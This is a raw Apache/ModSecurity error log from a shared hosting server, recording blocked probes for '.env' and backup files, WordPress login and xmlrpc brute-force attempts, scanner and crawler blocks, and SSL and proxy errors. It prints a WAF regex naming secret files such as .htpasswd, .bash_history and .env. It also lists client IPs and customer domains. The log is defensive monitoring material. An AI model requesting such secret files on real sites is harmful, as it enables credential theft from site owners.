[Tue May 26 18:34:11.575982 2026] [security2:error] [pid 1007701:tid 1007889] [client 85.11.167.49:63320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "friendsalongtheway.net"] [uri "/.env"] [unique_id "ahWaSw05qHzKMxj0enGiKwAAAL8"]
[Tue May 26 18:34:12.207731 2026] [security2:error] [pid 1007701:tid 1007883] [client 85.11.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWaSw05qHzKMxj0enGiMwAAALk"]
[Tue May 26 18:34:12.833257 2026] [security2:error] [pid 1007701:tid 1007863] [client 85.11.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWaTA05qHzKMxj0enGiPgAAAKU"]
[Tue May 26 18:34:12.963736 2026] [security2:error] [pid 1007701:tid 1007918] [client 85.11.167.49:63320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "friendsalongtheway.net"] [uri "/.env.backup"] [unique_id "ahWaTA05qHzKMxj0enGiSwAAANw"]
[Tue May 26 18:34:13.093659 2026] [security2:error] [pid 1007701:tid 1007838] [client 85.11.167.49:63320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "friendsalongtheway.net"] [uri "/config/.env"] [unique_id "ahWaTQ05qHzKMxj0enGiTQAAAIw"]
[Tue May 26 18:34:13.240942 2026] [security2:error] [pid 1007701:tid 1007944] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaTA05qHzKMxj0enGiRQAAAPY"]
[Tue May 26 18:34:15.316684 2026] [security2:error] [pid 1007701:tid 1007881] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaTg05qHzKMxj0enGiXgAAALc"]
[Tue May 26 18:34:17.039320 2026] [security2:error] [pid 998632:tid 998877] [client 123.17.157.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaT61OTU2dW0MS1EnPUAAAAFI"]
[Tue May 26 18:34:17.076872 2026] [security2:error] [pid 998632:tid 998751] [remote 121.200.216.55:57846] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaUa1OTU2dW0MS1EnPXgAASF8"]
[Tue May 26 18:34:17.198883 2026] [security2:error] [pid 1007701:tid 1007892] [client 172.86.66.156:63731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.66.86.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWaUA05qHzKMxj0enGipAAAAMI"], referer: https://www.cagmedya.com/
[Tue May 26 18:34:17.199072 2026] [security2:error] [pid 1007701:tid 1007892] [client 172.86.66.156:63731] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWaUA05qHzKMxj0enGipAAAAMI"], referer: https://www.cagmedya.com/
[Tue May 26 18:34:17.738507 2026] [security2:error] [pid 1007701:tid 1007922] [client 124.43.5.103:54192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaUQ05qHzKMxj0enGisQAAAOA"]
[Tue May 26 18:34:17.738618 2026] [security2:error] [pid 1007701:tid 1007922] [client 124.43.5.103:54192] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaUQ05qHzKMxj0enGisQAAAOA"]
[Tue May 26 18:34:19.062830 2026] [security2:error] [pid 1007701:tid 1007944] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaUg05qHzKMxj0enGitAAAAPY"]
[Tue May 26 18:34:21.413816 2026] [security2:error] [pid 1007701:tid 1007858] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaVA05qHzKMxj0enGi1AAAAKA"]
[Tue May 26 18:34:23.888300 2026] [security2:error] [pid 998632:tid 998899] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaVq1OTU2dW0MS1EnPmAAAAGY"]
[Tue May 26 18:34:24.597871 2026] [security2:error] [pid 1007701:tid 1007703] [remote 178.104.90.233:56194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWaWA05qHzKMxj0enGjCgAA5QE"]
[Tue May 26 18:34:27.021863 2026] [security2:error] [pid 998632:tid 998798] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaWa1OTU2dW0MS1EnPuAAAAAc"]
[Tue May 26 18:34:28.462911 2026] [security2:error] [pid 998632:tid 998822] [client 124.43.5.103:54478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaXK1OTU2dW0MS1EnP0wAAAB4"]
[Tue May 26 18:34:28.463049 2026] [security2:error] [pid 998632:tid 998822] [client 124.43.5.103:54478] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaXK1OTU2dW0MS1EnP0wAAAB4"]
[Tue May 26 18:34:28.772705 2026] [security2:error] [pid 1007701:tid 1007926] [client 114.119.156.126:30195] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "krishnawoodworks.com"] [uri "/robots.txt"] [unique_id "ahWaXA05qHzKMxj0enGjMwAAAOQ"]
[Tue May 26 18:34:31.018235 2026] [security2:error] [pid 1007701:tid 1007896] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaXQ05qHzKMxj0enGjOQAAAMY"]
[Tue May 26 18:34:31.128162 2026] [security2:error] [pid 1007701:tid 1007867] [client 85.11.167.19:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "cpanel.ndequipments.com"] [uri "/.env"] [unique_id "ahWaXw05qHzKMxj0enGjRgAAAKk"]
[Tue May 26 18:34:31.340918 2026] [security2:error] [pid 998632:tid 998671] [remote 216.73.216.30:36298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaX61OTU2dW0MS1EnP5AAAGBI"]
[Tue May 26 18:34:31.448913 2026] [security2:error] [pid 998632:tid 998868] [client 85.11.167.19:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "cpanel.ndequipments.com"] [uri "/"] [unique_id "ahWaX61OTU2dW0MS1EnP5QAAAEo"]
[Tue May 26 18:34:32.590608 2026] [security2:error] [pid 1007701:tid 1007844] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaXw05qHzKMxj0enGjSwAAAJI"]
[Tue May 26 18:34:34.656772 2026] [security2:error] [pid 1007701:tid 1007767] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWaYg05qHzKMxj0enGjXwAAzEE"]
[Tue May 26 18:34:34.657042 2026] [security2:error] [pid 1007701:tid 1007902] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWaYg05qHzKMxj0enGjXwAAzEE"]
[Tue May 26 18:34:35.007849 2026] [security2:error] [pid 1007701:tid 1007763] [remote 162.214.184.71:53058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaYg05qHzKMxj0enGjaQAAyj0"]
[Tue May 26 18:34:36.106262 2026] [security2:error] [pid 998632:tid 998691] [remote 216.73.216.30:36298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaZK1OTU2dW0MS1EnQPgAARiM"]
[Tue May 26 18:34:36.150864 2026] [security2:error] [pid 1007701:tid 1007916] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaYw05qHzKMxj0enGjcgAAANo"]
[Tue May 26 18:34:37.692790 2026] [security2:error] [pid 998632:tid 998877] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaZK1OTU2dW0MS1EnQRAAAAFI"]
[Tue May 26 18:34:37.886046 2026] [security2:error] [pid 1007701:tid 1007765] [remote 162.214.184.71:53058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaZQ05qHzKMxj0enGjjQAA-z8"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:34:39.379119 2026] [security2:error] [pid 1007701:tid 1007913] [client 124.43.5.103:54759] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaZw05qHzKMxj0enGjnQAAANc"]
[Tue May 26 18:34:39.379267 2026] [security2:error] [pid 1007701:tid 1007913] [client 124.43.5.103:54759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaZw05qHzKMxj0enGjnQAAANc"]
[Tue May 26 18:34:39.760903 2026] [security2:error] [pid 1007701:tid 1007836] [client 14.182.126.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaZw05qHzKMxj0enGjnAAAAIo"]
[Tue May 26 18:34:40.960593 2026] [security2:error] [pid 998632:tid 998816] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaaK1OTU2dW0MS1EnQXwAAABk"]
[Tue May 26 18:34:41.356764 2026] [security2:error] [pid 1007701:tid 1007775] [remote 216.73.216.30:61252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaaQ05qHzKMxj0enGjuAAAtEk"]
[Tue May 26 18:34:41.558698 2026] [security2:error] [pid 998632:tid 998661] [remote 153.122.170.42:60042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWaaa1OTU2dW0MS1EnQYwAAGAk"]
[Tue May 26 18:34:42.564095 2026] [security2:error] [pid 998632:tid 998741] [remote 153.122.170.42:60042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWaaq1OTU2dW0MS1EnQagAAIVU"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 18:34:43.333718 2026] [security2:error] [pid 1007701:tid 1007949] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaag05qHzKMxj0enGjyAAAAPs"]
[Tue May 26 18:34:44.770756 2026] [security2:error] [pid 998632:tid 998708] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWabK1OTU2dW0MS1EnQhAAAfzQ"]
[Tue May 26 18:34:44.770983 2026] [security2:error] [pid 998632:tid 998924] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWabK1OTU2dW0MS1EnQhAAAfzQ"]
[Tue May 26 18:34:45.597004 2026] [security2:error] [pid 998632:tid 998879] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaba1OTU2dW0MS1EnQjgAAAFQ"]
[Tue May 26 18:34:46.122349 2026] [security2:error] [pid 1007701:tid 1007807] [remote 216.73.216.30:61252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWabg05qHzKMxj0enGjywAA0Wk"]
[Tue May 26 18:34:48.226112 2026] [security2:error] [pid 998632:tid 998881] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWab61OTU2dW0MS1EnQpQAAAFY"]
[Tue May 26 18:34:49.919857 2026] [security2:error] [pid 1007701:tid 1007935] [client 124.43.5.103:17589] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWacQ05qHzKMxj0enGj4gAAAO0"]
[Tue May 26 18:34:49.919974 2026] [security2:error] [pid 1007701:tid 1007935] [client 124.43.5.103:17589] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWacQ05qHzKMxj0enGj4gAAAO0"]
[Tue May 26 18:34:49.990176 2026] [security2:error] [pid 998632:tid 998857] [client 74.7.228.1:59256] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "gciamd.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWaca1OTU2dW0MS1EnQzAAAPxw"]
[Tue May 26 18:34:50.116038 2026] [security2:error] [pid 1007701:tid 1007947] [client 74.7.230.18:59334] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "gcirsm.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWacg05qHzKMxj0enGj5QAA-RY"]
[Tue May 26 18:34:50.796789 2026] [ssl:error] [pid 998632:tid 998690] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.016826 2026] [ssl:error] [pid 998632:tid 998711] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.017733 2026] [ssl:error] [pid 998632:tid 998706] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.017848 2026] [ssl:error] [pid 998632:tid 998718] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.019701 2026] [ssl:error] [pid 998632:tid 998765] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.020134 2026] [ssl:error] [pid 998632:tid 998765] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.123961 2026] [security2:error] [pid 1007701:tid 1007721] [remote 216.73.216.30:61252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWacw05qHzKMxj0enGj-AABAhM"]
[Tue May 26 18:34:51.308314 2026] [ssl:error] [pid 998632:tid 998779] [remote 102.89.83.210:12885] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:34:51.393383 2026] [security2:error] [pid 998632:tid 998903] [client 114.119.155.154:64905] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWac61OTU2dW0MS1EnQ5gAAAGo"], referer: http://eco-green.com.mx/w2.php?JGNS=NOU1508997689&g=17&m=3
[Tue May 26 18:34:51.856656 2026] [security2:error] [pid 998632:tid 998915] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWac61OTU2dW0MS1EnQ4AAAAHY"]
[Tue May 26 18:34:54.566057 2026] [core:crit] [pid 998632:tid 998815] (13)Permission denied: [client 129.226.213.145:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:34:54.762571 2026] [proxy:error] [pid 1007701:tid 1007879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:34:54.762636 2026] [proxy_http:error] [pid 1007701:tid 1007879] [client 161.35.138.197:57188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:34:54.763242 2026] [proxy:error] [pid 1007701:tid 1007879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:34:54.763278 2026] [proxy_http:error] [pid 1007701:tid 1007879] [client 161.35.138.197:57188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:34:54.946171 2026] [proxy:error] [pid 1007701:tid 1007852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:34:54.946242 2026] [proxy_http:error] [pid 1007701:tid 1007852] [client 161.35.138.197:57202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.haddingtonwines.com/
[Tue May 26 18:34:54.946871 2026] [proxy:error] [pid 1007701:tid 1007852] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:34:54.946908 2026] [proxy_http:error] [pid 1007701:tid 1007852] [client 161.35.138.197:57202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: http://cpcalendars.haddingtonwines.com/
[Tue May 26 18:34:54.970845 2026] [security2:error] [pid 998632:tid 998878] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWada1OTU2dW0MS1EnQ-QAAAFM"]
